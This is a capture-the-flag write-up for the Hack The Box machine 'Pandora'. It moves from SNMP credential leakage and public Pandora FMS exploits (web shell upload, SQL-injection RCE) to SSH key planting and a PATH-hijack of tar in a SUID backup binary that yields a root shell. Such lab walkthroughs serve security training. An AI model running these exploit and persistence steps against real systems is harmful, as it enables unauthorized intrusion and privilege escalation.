Pandora
Recon
HTTP (80)
Website is serving HTML files and form goes to HTML itself, so most probably nothing from this domain.
Subdomain enumeration comes empty handed too
└─$ domain='panda.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 908SSH is almost never vulnerable, HTTP has nothing, no subdomains or hidden path 🤔 Feels like TCP doesn't haven any vulnerabilities. Let's try UDP scan before moving on.
SNMP
└─$ sudo nmap -n -sU -F --max-retries 1 --open panda.htb
PORT STATE SERVICE
161/udp open snmpSNMP is open -> https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
Setup for better enumeration:
└─$ sudo apt-get install snmp-mibs-downloader -y
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.confStart enum:
└─$ snmpbulkwalk -c public -v2c 10.129.71.80 . | tee snmp.log
...
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.982 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.984 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.989 = STRING: "-o -p -- \\u --noclear tty1 linux"
HOST-RESOURCES-MIB::hrSWRunParameters.1038 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1039 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1125 = STRING: "-u daniel -p HotelBabylon23"
...SSH (daniel)
└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)daniel@pandora:/var/www/pandora/pandora_console$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>Port forward the application
└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb -L 8000:0:80From frontend we see version is v7.0NG.742_FIX_PERL2020, it can also be found in config_process.php
daniel@pandora:/var/www/pandora/pandora_console$ cat ./include/config_process.php | grep _version
$build_version = 'PC200103';
$pandora_version = 'v7.0NG.742_FIX_PERL2020';SSH (matt)
└─$ git clone -q https://github.com/UNICORDev/exploit-CVE-2020-5844.git
└─$ py exploit-CVE-2020-5844/exploit-CVE-2020-5844.py -t 127.0.0.1 8000 -u daniel HotelBabylon23
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
USERNAME: daniel
PASSWORD: HotelBabylon23
WEBFILE: unicord.php
WEBSITE: http://127.0.0.1:8000/pandora_console
PHPSESS: dee7h37beh357356o48mem3d4m
ERRORED: Invalid credentials!
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami
└─$ curl http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>CVE failed, can't read config and only matt can read it.
daniel@pandora:/var/www/pandora/pandora_console$ ls -alh ./include/config.php
-rw------- 1 matt matt 413 Dec 3 2021 ./include/config.phpPandora_v7.0NG.742_exploit_unauthenticated -> Pandora FMS 742: Critical Code Vulnerabilities Explained
└─$ git clone -q https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
└─$ py Pandora_v7.0NG.742_exploit_unauthenticated/sqlpwn.py -t 127.0.0.1:8000
URL: http://127.0.0.1:8000/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : nudijm8drqtrr94j5qkf6nuv5r
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8000/pandora_console/images/pwn.php?test=
CMD > id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
---
└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken
---
CMD > ls /home/matt -alh
total 24K
drwxr-xr-x 2 matt matt 4.0K Dec 7 2021 .
drwxr-xr-x 4 root root 4.0K Dec 7 2021 ..
lrwxrwxrwx 1 matt matt 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 matt matt 3.7K Feb 25 2020 .bashrc
-rw-r--r-- 1 matt matt 807 Feb 25 2020 .profile
-rw-r----- 1 root matt 33 Dec 11 19:02 user.txt
CMD > mkdir /home/matt/.ssh
CMD > echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' > /home/matt/.ssh/authorized_keys└─$ ssh -i id_rsa matt@panda.htb
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)User.txt
matt@pandora:~$ cat user.txt
c3ad8efa5ad16bc60cec796cb0650520Privilege Escalation
matt@pandora:/var/www/pandora/pandora_console/include$ cat config.php
<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="PandoraFMSSecurePass2021";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0);
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| information_schema |
| pandora |
+--------------------+
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SHOW TABLES;'
| tpassword_history |
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SELECT * FROM tpassword_history;'
+---------+---------+----------------------------------+---------------------+---------------------+
| id_pass | id_user | password | date_begin | date_end |
+---------+---------+----------------------------------+---------------------+---------------------+
| 1 | matt | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | 0000-00-00 00:00:00 |
| 2 | daniel | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | 0000-00-00 00:00:00 |
+---------+---------+----------------------------------+---------------------+---------------------+
No sudo for us, but we have SUID binaries
matt@pandora:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/pandora_backup
...└─$ scp -i id_rsa matt@panda.htb:/usr/bin/pandora_backup .
└─$ file pandora_backup
pandora_backup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
└─$ strings pandora_backup | grep -vE '^[._;]|GLIBC'
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
libc.so.6
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
completed.0
frame_dummy
backup.c
mainThe binary is using relative path instead of absolute path, we can hijack tar to be anything we want.
matt@pandora:/tmp$ nano tar
matt@pandora:/tmp$ cat tar
#!/bin/bash
mkdir /root/.ssh
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' >> /root/.ssh/authorized_keys
install -m4777 /bin/bash /tmp/rootbashSSH as root doesn't work because there's a deny rule
matt@pandora:/tmp$ cat /etc/ssh/sshd_config | grep Deny
DenyUsers rootRoot.txt
matt@pandora:/tmp$ /tmp/rootbash -p
rootbash-5.0# cat /root/root.txt
3b7410b14d3d60daf56dc908f89798deLast updated